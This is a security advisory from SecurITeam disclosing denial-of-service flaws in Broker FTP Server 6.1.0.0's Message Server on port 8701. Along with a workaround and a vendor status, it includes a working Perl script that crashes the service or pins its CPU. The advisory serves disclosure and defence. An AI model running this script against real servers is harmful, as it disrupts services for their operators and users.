Broker FTP DoS (Message Server) ------------------------------------------------ Article reference: http://www.securiteam.com/windowsntfocus/5IP0B0AC1I.html SUMMARY Beyond Security's SecurITeam has discovered two security vulnerabilities in the Broker FTP product, these vulnerabilities allow a remote attacker to repeatedly crash the TsFtpSrv.exe (The FTP Service) and to cause it to use large amount of CPU time. DETAILS Affected version:  * Broker FTP Server version 6.1.0.0 By connecting and immediately disconnecting to the Broker FTP server's Message Server (by default residing on port 8701) it is possible to cause an exception in the TsFtpSrv.exe program. The exception doesn't cause any harm beside showing a message that the TsFtpSrv.exe has encountered an Application Error. By connecting and not sending anything (but keeping the connection open), it is possible to cause the TsFtpSrv.exe to utilize large amount of CPU time (basically while the connection is kept open, CPU usage will be 100%). Workaround: It is not clear what the Message Server is used for, but modifying the TsFtpSrv.ini's [TSMessageServer] allows an administrator to control what port the server listens on (and change it from the default one). Exploit: #!/usr/bin/perl -w # TransSoft Broker FTP Server DoS (CPU usage and Exception) # use Socket; if (not $ARGV[0]) {         print qq~                 Usage: pfdos.pl < host>         ~; exit;} $ip=$ARGV[0]; print "host: " . $ip . "\n\n"; sendexplt("A"); sub sendexplt {  my ($pstr)=@_;         $target= inet_aton($ip) || die("inet_aton problems");  socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp') ||0) ||  die("Socket problems\n");  if(connect(S,pack "SnA4x8",2,8701,$target)){  select(S);                 $|=1;  print $pstr;  sleep 100;          close(S);  } else { die("Can't connect...\n"); } } Vendor Status: We have tried to contact the vendor over a month ago, but have not received any response as of yet. ADDITIONAL INFORMATION The information has been provided by   SecurITeam. -- Beyond Security Ltd. "Know that you're safe" http://www.BeyondSecurity.com http://www.SecuriTeam.com ==================== ==================== DISCLAIMER: The information in this bulletin is provided "AS IS" without warranty of any kind. In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.